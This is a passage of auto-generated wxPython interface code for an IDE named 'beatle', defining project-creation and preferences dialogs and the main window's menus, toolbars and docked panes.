0 ) fgSizer69.AddGrowableCol( 0 ) fgSizer69.AddGrowableRow( 1 ) fgSizer69.SetFlexibleDirection( wx.BOTH ) fgSizer69.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer68 = wx.FlexGridSizer( 3, 2, 0, 0 ) fgSizer68.AddGrowableCol( 1 ) fgSizer68.SetFlexibleDirection( wx.BOTH ) fgSizer68.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText33 = wx.StaticText( self.m_panel6, wx.ID_ANY, u"Author:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText33.Wrap( -1 ) fgSizer68.Add( self.m_staticText33, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_textCtrl251 = wx.TextCtrl( self.m_panel6, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer68.Add( self.m_textCtrl251, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText35 = wx.StaticText( self.m_panel6, wx.ID_ANY, u"Date:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText35.Wrap( -1 ) fgSizer68.Add( self.m_staticText35, 0, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 ) self.m_datePicker1 = wx.DatePickerCtrl( self.m_panel6, wx.ID_ANY, wx.DefaultDateTime, wx.DefaultPosition, wx.DefaultSize, wx.DP_DEFAULT|wx.DP_SHOWCENTURY ) fgSizer68.Add( self.m_datePicker1, 0, wx.ALL|wx.EXPAND, 5 ) self.m_checkBox53 = wx.CheckBox( self.m_panel6, wx.ID_ANY, u"Add license:", wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer68.Add( self.m_checkBox53, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 5 ) m_choice16Choices = [ u"wxWidgets license", u"GNU GPL", u"GNU LGPL", u"FreeBSD", u"Creative Commons" ] self.m_choice16 = wx.Choice( self.m_panel6, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_choice16Choices, 0 ) self.m_choice16.SetSelection( 0 ) fgSizer68.Add( self.m_choice16, 0, wx.ALL|wx.EXPAND, 5 ) fgSizer69.Add( fgSizer68, 1, wx.EXPAND|wx.TOP|wx.RIGHT|wx.LEFT, 5 ) sbSizer20 = wx.StaticBoxSizer( wx.StaticBox( self.m_panel6, wx.ID_ANY, u"description" ), wx.VERTICAL ) self.m_richText13 = wx.richtext.RichTextCtrl( sbSizer20.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.VSCROLL|wx.HSCROLL|wx.NO_BORDER|wx.WANTS_CHARS ) sbSizer20.Add( self.m_richText13, 1, wx.EXPAND |wx.ALL, 5 ) fgSizer69.Add( sbSizer20, 1, wx.EXPAND|wx.RIGHT|wx.LEFT, 5 ) self.m_panel6.SetSizer( fgSizer69 ) self.m_panel6.Layout() fgSizer69.Fit( self.m_panel6 ) self.m_auinotebook2.AddPage( self.m_panel6, u"Autoring", False ) self.m_panel7 = wx.Panel( self.m_auinotebook2, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) fgSizer72 = wx.FlexGridSizer( 2, 1, 0, 0 ) fgSizer72.AddGrowableCol( 0 ) fgSizer72.AddGrowableRow( 0 ) fgSizer72.SetFlexibleDirection( wx.BOTH ) fgSizer72.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer73 = wx.FlexGridSizer( 3, 2, 0, 0 ) fgSizer73.AddGrowableCol( 1 ) fgSizer73.SetFlexibleDirection( wx.BOTH ) fgSizer73.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_staticText3111 = wx.StaticText( self.m_panel7, wx.ID_ANY, u"Project type:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText3111.Wrap( -1 ) fgSizer73.Add( self.m_staticText3111, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) m_choice151Choices = [ u"unspecified", u"static library", u"dynamic library", u"executable", u"only code" ] self.m_choice151 = wx.Choice( self.m_panel7, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, m_choice151Choices, 0 ) self.m_choice151.SetSelection( 3 ) fgSizer73.Add( self.m_choice151, 0, wx.ALL|wx.EXPAND, 5 ) self.m_staticText321 = wx.StaticText( self.m_panel7, wx.ID_ANY, u"Versión:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText321.Wrap( -1 ) fgSizer73.Add( self.m_staticText321, 0, wx.ALL|wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL, 5 ) fgSizer661 = wx.FlexGridSizer( 1, 3, 0, 0 ) fgSizer661.SetFlexibleDirection( wx.BOTH ) fgSizer661.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_spinCtrl11 = wx.SpinCtrl( self.m_panel7, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 50,-1 ), wx.SP_ARROW_KEYS, 0, 10, 0 ) fgSizer661.Add( self.m_spinCtrl11, 0, wx.ALL, 5 ) self.m_spinCtrl21 = wx.SpinCtrl( self.m_panel7, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 50,-1 ), wx.SP_ARROW_KEYS, 0, 10, 0 ) fgSizer661.Add( self.m_spinCtrl21, 0, wx.ALL, 5 ) self.m_spinCtrl31 = wx.SpinCtrl( self.m_panel7, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 50,-1 ), wx.SP_ARROW_KEYS, 0, 10, 0 ) fgSizer661.Add( self.m_spinCtrl31, 0, wx.ALL, 5 ) fgSizer73.Add( fgSizer661, 1, wx.EXPAND, 5 ) self.m_staticText43 = wx.StaticText( self.m_panel7, wx.ID_ANY, u"Build:", wx.DefaultPosition, wx.DefaultSize, 0 ) self.m_staticText43.Wrap( -1 ) fgSizer73.Add( self.m_staticText43, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT, 5 ) self.m_checkBox54 = wx.CheckBox( self.m_panel7, wx.ID_ANY, u"create makefile", wx.DefaultPosition, wx.DefaultSize, 0 ) fgSizer73.Add( self.m_checkBox54, 0, wx.ALL, 5 ) fgSizer72.Add( fgSizer73, 1, wx.EXPAND|wx.TOP|wx.RIGHT|wx.LEFT, 5 ) self.m_panel7.SetSizer( fgSizer72 ) self.m_panel7.Layout() fgSizer72.Fit( self.m_panel7 ) self.m_auinotebook2.AddPage( self.m_panel7, u"Generation", False ) self.fgSizer4.Add( self.m_auinotebook2, 0, wx.ALL|wx.EXPAND, 5 ) fgSizer161 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer161.AddGrowableCol( 1 ) fgSizer161.SetFlexibleDirection( wx.BOTH ) fgSizer161.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) fgSizer161.SetMinSize( wx.Size( -1,28 ) ) self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.Size( -1,28 ), wx.BU_AUTODRAW|wx.NO_BORDER ) fgSizer161.Add( self.m_info, 0, wx.ALL, 5 ) m_sdbSizer1 = wx.StdDialogButtonSizer() self.m_sdbSizer1OK = wx.Button( self, wx.ID_OK ) m_sdbSizer1.AddButton( self.m_sdbSizer1OK ) self.m_sdbSizer1Cancel = wx.Button( self, wx.ID_CANCEL ) m_sdbSizer1.AddButton( self.m_sdbSizer1Cancel ) m_sdbSizer1.Realize(); m_sdbSizer1.SetMinSize( wx.Size( -1,32 ) ) fgSizer161.Add( m_sdbSizer1, 0, wx.EXPAND|wx.TOP|wx.BOTTOM|wx.RIGHT, 5 ) self.fgSizer4.Add( fgSizer161, 0, wx.EXPAND, 5 ) self.SetSizer( self.fgSizer4 ) self.Layout() self.Centre( wx.BOTH ) # Connect Events self.m_textCtrl1.Bind( wx.EVT_TEXT, self.OnChangeProjectName ) self.m_bpButton3.Bind( wx.EVT_BUTTON, self.OnChooseDir ) self.m_choicebook1.Bind( wx.EVT_CHOICEBOOK_PAGE_CHANGED, self.OnPageChanged ) self.m_choicebook1.Bind( wx.EVT_CHOICEBOOK_PAGE_CHANGING, self.OnPageChanging ) self.m_checkBox52.Bind( wx.EVT_CHECKBOX, self.OnToggleMasterInclude ) self.m_textCtrl252.Bind( wx.EVT_TEXT, self.on_mysql_host_change ) self.m_textCtrl231.Bind( wx.EVT_TEXT, self.on_mysql_user_change ) self.m_textCtrl241.Bind( wx.EVT_TEXT, self.on_mysql_password_change ) self.m_button3.Bind( wx.EVT_BUTTON, self.OnTestDatabaseConnection ) self.m_sdbSizer1OK.Bind( wx.EVT_BUTTON, self.OnOK ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnChangeProjectName( self, event ): event.Skip() def OnChooseDir( self, event ): event.Skip() def OnPageChanged( self, event ): event.Skip() def OnPageChanging( self, event ): event.Skip() def OnToggleMasterInclude( self, event ): event.Skip() def on_mysql_host_change( self, event ): event.Skip() def on_mysql_user_change( self, event ): event.Skip() def on_mysql_password_change( self, event ): event.Skip() def OnTestDatabaseConnection( self, event ): event.Skip() def OnOK( self, event ): event.Skip() ########################################################################### ## Class Preferences ########################################################################### class Preferences ( wx.Dialog ): def __init__( self, parent ): wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"Preferences", pos = wx.DefaultPosition, size = wx.Size( 668,418 ), style = wx.DEFAULT_DIALOG_STYLE ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) fgSizer77 = wx.FlexGridSizer( 3, 1, 0, 0 ) fgSizer77.AddGrowableCol( 0 ) fgSizer77.AddGrowableRow( 0 ) fgSizer77.SetFlexibleDirection( wx.BOTH ) fgSizer77.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_auinotebook3 = wx.aui.AuiNotebook( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.aui.AUI_NB_BOTTOM ) fgSizer77.Add( self.m_auinotebook3, 1, wx.EXPAND |wx.ALL, 5 ) fgSizer164 = wx.FlexGridSizer( 1, 2, 0, 0 ) fgSizer164.AddGrowableCol( 1 ) fgSizer164.SetFlexibleDirection( wx.BOTH ) fgSizer164.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_info = wx.BitmapButton( self, wx.ID_ANY, wx.ArtProvider.GetBitmap( wx.ART_TIP, wx.ART_BUTTON ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|wx.NO_BORDER ) fgSizer164.Add( self.m_info, 0, wx.ALIGN_RIGHT, 5 ) m_sdbSizer3 = wx.StdDialogButtonSizer() self.m_sdbSizer3OK = wx.Button( self, wx.ID_OK ) m_sdbSizer3.AddButton( self.m_sdbSizer3OK ) self.m_sdbSizer3Cancel = wx.Button( self, wx.ID_CANCEL ) m_sdbSizer3.AddButton( self.m_sdbSizer3Cancel ) m_sdbSizer3.Realize(); fgSizer164.Add( m_sdbSizer3, 1, wx.EXPAND, 5 ) fgSizer77.Add( fgSizer164, 1, wx.EXPAND|wx.BOTTOM, 5 ) self.SetSizer( fgSizer77 ) self.Layout() self.Centre( wx.BOTH ) # Connect Events self.Bind( wx.EVT_INIT_DIALOG, self.OnInitDialog ) self.m_sdbSizer3OK.Bind( wx.EVT_BUTTON, self.OnOK ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def OnInitDialog( self, event ): event.Skip() def OnOK( self, event ): event.Skip() ########################################################################### ## Class FullScreen ########################################################################### class FullScreen ( wx.Frame ): def __init__( self, parent ): wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = wx.EmptyString, pos = wx.DefaultPosition, size = wx.Size( 500,300 ), style = wx.MAXIMIZE|wx.STAY_ON_TOP|wx.TAB_TRAVERSAL ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) self.SetExtraStyle( wx.WS_EX_BLOCK_EVENTS|wx.WS_EX_TRANSIENT ) self.Centre( wx.BOTH ) def __del__( self ): pass ########################################################################### ## Class MainWindow ########################################################################### class MainWindow ( wx.Frame ): def __init__( self, parent ): wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"beatle", pos = wx.DefaultPosition, size = wx.Size( 1124,740 ), style = wx.DEFAULT_FRAME_STYLE|wx.SYSTEM_MENU|wx.TAB_TRAVERSAL ) self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize ) self.m_mgr = wx.aui.AuiManager() self.m_mgr.SetManagedWindow( self ) self.m_mgr.SetFlags(wx.aui.AUI_MGR_ALLOW_FLOATING|wx.aui.AUI_MGR_TRANSPARENT_DRAG|wx.aui.AUI_MGR_TRANSPARENT_HINT) self.m_menubar1 = wx.MenuBar( wx.MB_DOCKABLE ) self.menuFile = wx.Menu() self.newWorkspace = wx.MenuItem( self.menuFile, ID_NEW_WORKSPACE, u"New workspace", u"create a new workspace", wx.ITEM_NORMAL ) self.newWorkspace.SetBitmap( wx.Bitmap( localpath('app/res/workspace.xpm'), wx.BITMAP_TYPE_ANY ) ) self.menuFile.AppendItem( self.newWorkspace ) self.newProject = wx.MenuItem( self.menuFile, ID_NEW_PROJECT, u"New project"+ u"\t" + u"Ctrl+N", u"create a new project", wx.ITEM_NORMAL ) self.newProject.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_NEW, wx.ART_MENU ) ) self.menuFile.AppendItem( self.newProject ) self.menuFile.AppendSeparator() self.openWorkspace = wx.MenuItem( self.menuFile, ID_OPEN_WORKSPACE, u"Open workspace...", u"open an existing workspace", wx.ITEM_NORMAL ) self.menuFile.AppendItem( self.openWorkspace ) self.openProject = wx.MenuItem( self.menuFile, ID_OPEN_PROJECT, u"Open project ..."+ u"\t" + u"Ctrl+O", u"open an existing project", wx.ITEM_NORMAL ) self.openProject.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_FILE_OPEN, wx.ART_MENU ) ) self.menuFile.AppendItem( self.openProject ) self.menuMRU = wx.Menu() self.menuFile.AppendSubMenu( self.menuMRU, u"Recent files" ) self.menuFile.AppendSeparator() self.m_menuItem26 = wx.MenuItem( self.menuFile, ID_CLOSE_WORKSPACE, u"Close workspace", wx.EmptyString, wx.ITEM_NORMAL ) self.menuFile.AppendItem( self.m_menuItem26 ) self.m_menuItem27 = wx.MenuItem( self.menuFile, ID_CLOSE_PROJECT, u"Close project", wx.EmptyString, wx.ITEM_NORMAL ) self.menuFile.AppendItem( self.m_menuItem27 ) self.menuFile.AppendSeparator() self.importProject = wx.MenuItem( self.menuFile, ID_IMPORT_PROJECT, u"Import ...", u"import external project in current workspace", wx.ITEM_NORMAL ) self.menuFile.AppendItem( self.importProject ) self.menuFile.AppendSeparator() self.saveWorkspace = wx.MenuItem( self.menuFile, ID_SAVE_WORKSPACE, u"Save workspace", u"save current workspace", wx.ITEM_NORMAL ) self.saveWorkspace.SetBitmap( wx.Bitmap( localpath('app/res/save_all.xpm'), wx.BITMAP_TYPE_ANY ) ) self.menuFile.AppendItem( self.saveWorkspace ) self.saveProject = wx.MenuItem( self.menuFile, ID_SAVE_PROJECT, u"Save project"+ u"\t" + u"Ctrl+S", u"save current project", wx.ITEM_NORMAL ) self.saveProject.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_FILE_SAVE, wx.ART_MENU ) ) self.menuFile.AppendItem( self.saveProject ) self.menuFile.AppendSeparator() self.quit = wx.MenuItem( self.menuFile, ID_QUIT, u"Quit"+ u"\t" + u"Ctrl+F4", u"exit application", wx.ITEM_NORMAL ) self.quit.SetBitmap( wx.ArtProvider.GetBitmap( u"gtk-quit", wx.ART_MENU ) ) self.menuFile.AppendItem( self.quit ) self.m_menubar1.Append( self.menuFile, u"&Main" ) self.menuEdit = wx.Menu() self.undo = wx.MenuItem( self.menuEdit, ID_UNDO, u"Undo"+ u"\t" + u"Ctrl+Z", u"undoes the last operation", wx.ITEM_NORMAL ) self.undo.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_UNDO, wx.ART_TOOLBAR ) ) self.menuEdit.AppendItem( self.undo ) self.redo = wx.MenuItem( self.menuEdit, ID_REDO, u"Redo"+ u"\t" + u"Ctrl+Y", u"redoes the last operation", wx.ITEM_NORMAL ) self.redo.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_REDO, wx.ART_TOOLBAR ) ) self.menuEdit.AppendItem( self.redo ) self.menuEdit.AppendSeparator() self.copy = wx.MenuItem( self.menuEdit, ID_COPY, u"Copy"+ u"\t" + u"Ctrl+C", u"copy the selected element", wx.ITEM_NORMAL ) self.copy.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_COPY, wx.ART_MENU ) ) self.menuEdit.AppendItem( self.copy ) self.cut = wx.MenuItem( self.menuEdit, ID_CUT, u"Cut"+ u"\t" + u"Ctrl+X", u"cut the selected element", wx.ITEM_NORMAL ) self.cut.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_CUT, wx.ART_MENU ) ) self.menuEdit.AppendItem( self.cut ) self.paste = wx.MenuItem( self.menuEdit, ID_PASTE, u"Paste"+ u"\t" + u"Ctrl+V", u"paste from clipboard", wx.ITEM_NORMAL ) self.paste.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_PASTE, wx.ART_MENU ) ) self.menuEdit.AppendItem( self.paste ) self.menuEdit.AppendSeparator() self.delete = wx.MenuItem( self.menuEdit, ID_DELETE, u"Delete"+ u"\t" + u"Del", u"delete the selected element", wx.ITEM_NORMAL ) self.delete.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_DELETE, wx.ART_MENU ) ) self.menuEdit.AppendItem( self.delete ) self.menuEdit.AppendSeparator() self.editOpen = wx.MenuItem( self.menuEdit, ID_EDIT_OPEN, u"Open ...", u"open the selected element", wx.ITEM_NORMAL ) self.editOpen.SetBitmap( wx.ArtProvider.GetBitmap( u"gtk-edit", wx.ART_MENU ) ) self.menuEdit.AppendItem( self.editOpen ) self.editContext = wx.MenuItem( self.menuEdit, ID_EDIT_CONTEXT, u"Select contexts ..."+ u"\t" + u"Ctrl+Shift+C", u"edit the context of selected element", wx.ITEM_NORMAL ) self.menuEdit.AppendItem( self.editContext ) self.editUserSections = wx.MenuItem( self.menuEdit, ID_EDIT_USER_SECTIONS, u"Edit user sections ...", u"edit the user sections", wx.ITEM_NORMAL ) self.menuEdit.AppendItem( self.editUserSections ) self.editProperties = wx.MenuItem( self.menuEdit, ID_EDIT_PROPERTIES, u"Properties ..."+ u"\t" + u"Ctrl+Enter", u"edit the properties of selected element", wx.ITEM_NORMAL ) self.editProperties.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_INFORMATION, wx.ART_MENU ) ) self.menuEdit.AppendItem( self.editProperties ) self.menuEdit.AppendSeparator() self.preferences = wx.MenuItem( self.menuEdit, ID_PREFERENCES, u"Preferences", u"edit the application preferences", wx.ITEM_NORMAL ) self.preferences.SetBitmap( wx.ArtProvider.GetBitmap( u"gtk-preferences", wx.ART_TOOLBAR ) ) self.menuEdit.AppendItem( self.preferences ) self.m_menubar1.Append( self.menuEdit, u"&Edit" ) self.menuSearch = wx.Menu() self.find = wx.MenuItem( self.menuSearch, wx.ID_ANY, u"&Find ...", u"find any occurrence ", wx.ITEM_NORMAL ) self.menuSearch.AppendItem( self.find ) self.findInFiles = wx.MenuItem( self.menuSearch, wx.ID_ANY, u"Find in files ...", u"find any ocurrence in files", wx.ITEM_NORMAL ) self.menuSearch.AppendItem( self.findInFiles ) self.next = wx.MenuItem( self.menuSearch, wx.ID_ANY, u"Next"+ u"\t" + u"F3", wx.EmptyString, wx.ITEM_NORMAL ) self.menuSearch.AppendItem( self.next ) self.previous = wx.MenuItem( self.menuSearch, wx.ID_ANY, u"previous"+ u"\t" + u"Shift+F3", wx.EmptyString, wx.ITEM_NORMAL ) self.menuSearch.AppendItem( self.previous ) self.m_menubar1.Append( self.menuSearch, u"&Search" ) self.menuView = wx.Menu() self.menuView.AppendSeparator() self.m_menuItem72 = wx.MenuItem( self.menuView, wx.ID_ANY, u"Reset perspective", wx.EmptyString, wx.ITEM_NORMAL ) self.menuView.AppendItem( self.m_menuItem72 ) self.m_view_showToolbars = wx.MenuItem( self.menuView, wx.ID_ANY, u"show toolbars", u"Show all the current view toolbars", wx.ITEM_NORMAL ) self.menuView.AppendItem( self.m_view_showToolbars ) self.m_views = wx.MenuItem( self.menuView, wx.ID_ANY, u"Views", wx.EmptyString, wx.ITEM_CHECK ) self.menuView.AppendItem( self.m_views ) self.m_views.Check( True ) self.m_auxiliarPanes = wx.MenuItem( self.menuView, wx.ID_ANY, u"Auxiliar panes", wx.EmptyString, wx.ITEM_CHECK ) self.menuView.AppendItem( self.m_auxiliarPanes ) self.m_auxiliarPanes.Check( True ) self.m_menubar1.Append( self.menuView, u"&View" ) self.menuSettings = wx.Menu() self.compilerSettings = wx.MenuItem( self.menuSettings, wx.ID_ANY, u"build &tools ...", u"configure build tools", wx.ITEM_NORMAL ) self.menuSettings.AppendItem( self.compilerSettings ) self.m_menubar1.Append( self.menuSettings, u"S&ettings" ) self.menuTools = wx.Menu() self.m_menubar1.Append( self.menuTools, u"&Tools" ) self.menuHelp = wx.Menu() self.m_menubar1.Append( self.menuHelp, u"&Help" ) self.SetMenuBar( self.m_menubar1 ) self.m_auiToolBarFile = wx.aui.AuiToolBar( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.aui.AUI_TB_GRIPPER|wx.aui.AUI_TB_HORZ_LAYOUT ) self.m_new_workspace = self.m_auiToolBarFile.AddTool( ID_NEW_WORKSPACE, u"new workspace", wx.Bitmap( localpath('app/res/workspace.xpm'), wx.BITMAP_TYPE_ANY ), wx.NullBitmap, wx.ITEM_NORMAL, u"new project", wx.EmptyString, None ) self.m_new = self.m_auiToolBarFile.AddTool( ID_NEW_PROJECT, u"new project", wx.ArtProvider.GetBitmap( wx.ART_NEW, wx.ART_TOOLBAR ), wx.NullBitmap, wx.ITEM_NORMAL, u"new project", wx.EmptyString, None ) self.m_open = self.m_auiToolBarFile.AddTool( ID_OPEN_PROJECT, u"open project", wx.ArtProvider.GetBitmap( wx.ART_FILE_OPEN, wx.ART_TOOLBAR ), wx.NullBitmap, wx.ITEM_NORMAL, u"open project", wx.EmptyString, None ) self.m_save_project = self.m_auiToolBarFile.AddTool( ID_SAVE_PROJECT, u"save project", wx.ArtProvider.GetBitmap( wx.ART_FILE_SAVE, wx.ART_TOOLBAR ), wx.NullBitmap, wx.ITEM_NORMAL, u"save current", wx.EmptyString, None ) self.m_save_workspace = self.m_auiToolBarFile.AddTool( ID_SAVE_WORKSPACE, u"tool", wx.Bitmap( localpath('app/res/save_all.xpm'), wx.BITMAP_TYPE_ANY ), wx.NullBitmap, wx.ITEM_NORMAL, u"save workspace", wx.EmptyString, None ) self.m_auiToolBarFile.Realize() self.m_mgr.AddPane( self.m_auiToolBarFile, wx.aui.AuiPaneInfo().Name( u"file_toolbar" ).Top().Caption( u"file" ).PinButton( True ).Gripper().Dock().Resizable().FloatingSize( wx.Size( -1,-1 ) ).Row( 0 ).Position( 0 ).Layer( 10 ).ToolbarPane() ) self.m_auiToolBarEdit = wx.aui.AuiToolBar( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.aui.AUI_TB_GRIPPER|wx.aui.AUI_TB_HORZ_LAYOUT ) self.m_undo = self.m_auiToolBarEdit.AddTool( ID_UNDO, u"tool", wx.ArtProvider.GetBitmap( wx.ART_UNDO, wx.ART_TOOLBAR ), wx.NullBitmap, wx.ITEM_NORMAL, u"undo last operation", wx.EmptyString, None ) self.m_redo = self.m_auiToolBarEdit.AddTool( ID_REDO, u"tool", wx.ArtProvider.GetBitmap( wx.ART_REDO, wx.ART_TOOLBAR ), wx.NullBitmap, wx.ITEM_NORMAL, u"redo last operation", wx.EmptyString, None ) self.m_auiToolBarEdit.AddSeparator() self.m_copy = self.m_auiToolBarEdit.AddTool( ID_COPY, u"copy", wx.ArtProvider.GetBitmap( wx.ART_COPY, wx.ART_TOOLBAR ), wx.NullBitmap, wx.ITEM_NORMAL, u"copy selected", wx.EmptyString, None ) self.m_cut = self.m_auiToolBarEdit.AddTool( ID_CUT, u"cut", wx.ArtProvider.GetBitmap( wx.ART_CUT, wx.ART_TOOLBAR ), wx.NullBitmap, wx.ITEM_NORMAL, u"cut selected", wx.EmptyString, None ) self.m_paste = self.m_auiToolBarEdit.AddTool( ID_PASTE, u"paste", wx.ArtProvider.GetBitmap( wx.ART_PASTE, wx.ART_TOOLBAR ), wx.NullBitmap, wx.ITEM_NORMAL, u"paste from clipboard", wx.EmptyString, None ) self.m_auiToolBarEdit.AddSeparator() self.m_delete = self.m_auiToolBarEdit.AddTool( ID_DELETE, u"delete", wx.ArtProvider.GetBitmap( wx.ART_DELETE, wx.ART_TOOLBAR ), wx.NullBitmap, wx.ITEM_NORMAL, u"delete selected", wx.EmptyString, None ) self.m_auiToolBarEdit.Realize() self.m_mgr.AddPane( self.m_auiToolBarEdit, wx.aui.AuiPaneInfo().Name( u"edit_toolbar" ).Top().Caption( u"edit" ).PinButton( True ).Gripper().Dock().Resizable().FloatingSize( wx.Size( -1,-1 ) ).Row( 0 ).Position( 1 ).Layer( 10 ).ToolbarPane() ) self.m_statusBar1 = self.CreateStatusBar( 2, wx.ST_SIZEGRIP, wx.ID_ANY ) self.viewBook = wxx.AuiNotebook( self, wx.ID_ANY, wx.DefaultPosition, wx.Size( 300,-1 ), wx.aui.AUI_NB_BOTTOM|wx.aui.AUI_NB_SCROLL_BUTTONS|wx.aui.AUI_NB_TAB_EXTERNAL_MOVE|wx.aui.AUI_NB_TAB_MOVE|wx.aui.AUI_NB_TAB_SPLIT|wx.aui.AUI_NB_TOP|wx.aui.AUI_NB_WINDOWLIST_BUTTON|wx.NO_BORDER ) self.viewBook.SetMinSize( wx.Size( 300,-1 ) ) self.m_mgr.AddPane( self.viewBook, wx.aui.AuiPaneInfo() .Name( u"views" ).Left() .Caption( u"views" ).CaptionVisible( False ).MaximizeButton( True ).MinimizeButton( True ).PinButton( True ).PaneBorder( False ).Dock().Resizable().FloatingSize( wx.Size( 120,300 ) ).Row( 1 ).Position( 0 ).Layer( 4 ) ) self.docBook = wxx.AuiNotebook( self, wx.ID_ANY, wx.DefaultPosition, wx.Size( -1,-1 ), wx.aui.AUI_NB_CLOSE_ON_ACTIVE_TAB|wx.aui.AUI_NB_SCROLL_BUTTONS|wx.aui.AUI_NB_TAB_EXTERNAL_MOVE|wx.aui.AUI_NB_TAB_MOVE|wx.aui.AUI_NB_TAB_SPLIT|wx.aui.AUI_NB_TOP|wx.aui.AUI_NB_WINDOWLIST_BUTTON|wx.FULL_REPAINT_ON_RESIZE|wx.NO_BORDER ) self.m_mgr.AddPane( self.docBook, wx.aui.AuiPaneInfo() .Name( u"editors" ).Center() .Caption( u"editors" ).CaptionVisible( False ).CloseButton( False ).MaximizeButton( True ).PinButton( True ).PaneBorder( False ).Dock().Resizable().FloatingSize( wx.Size( 120,300 ) ).DockFixed( True ).Row( 0 ).Layer( 0 ) ) self.m_aux_panes = wx.Listbook( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LB_TOP|wx.NO_BORDER ) self.m_mgr.AddPane( self.m_aux_panes, wx.aui.AuiPaneInfo() .Name( u"auxiliar" ).Bottom() .Caption( u"auxiliar panes" ).CaptionVisible( False ).MaximizeButton( True ).MinimizeButton( True ).PinButton( True ).PaneBorder( False ).Dock().Resizable().FloatingSize( wx.Size( -1,-1 ) ).Row( 1 ).MinSize( wx.Size( 200,150 ) ).Layer( 2 ) ) self.m_panel37 = wx.Panel( self.m_aux_panes, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) fgSizer159 = wx.FlexGridSizer( 1, 1, 0, 0 ) fgSizer159.AddGrowableCol( 0 ) fgSizer159.AddGrowableRow( 0 ) fgSizer159.SetFlexibleDirection( wx.BOTH ) fgSizer159.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) from beatle.app.ui.ctrl import pythonTextEntry self.m_pythonEntry = pythonTextEntry(self.m_panel37) fgSizer159.Add( self.m_pythonEntry, 1, wx.ALL|wx.EXPAND, 5 ) self.m_panel37.SetSizer( fgSizer159 ) self.m_panel37.Layout() fgSizer159.Fit( self.m_panel37 ) self.m_aux_panes.AddPage( self.m_panel37, u"console", True ) self.m_panel30 = wx.Panel( self.m_aux_panes, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) fgSizer243 = wx.FlexGridSizer( 1, 1, 0, 0 ) fgSizer243.AddGrowableCol( 0 ) fgSizer243.AddGrowableRow( 0 ) fgSizer243.SetFlexibleDirection( wx.BOTH ) fgSizer243.SetNonFlexibleGrowMode( wx.FLEX_GROWMODE_SPECIFIED ) self.m_toolLog = wx.TextCtrl( self.m_panel30, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_MULTILINE|wx.TE_READONLY ) fgSizer243.Add( self.m_toolLog, 0, wx.ALL|wx.EXPAND, 5 ) self.m_panel30.SetSizer( fgSizer243 ) self.m_panel30.Layout() fgSizer243.Fit( self.m_panel30 ) self.m_aux_panes.AddPage( self.m_panel30, u"log", False ) self.m_aux_output_pane = wx.Panel( self.m_aux_panes, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL ) fgSizer2431 = 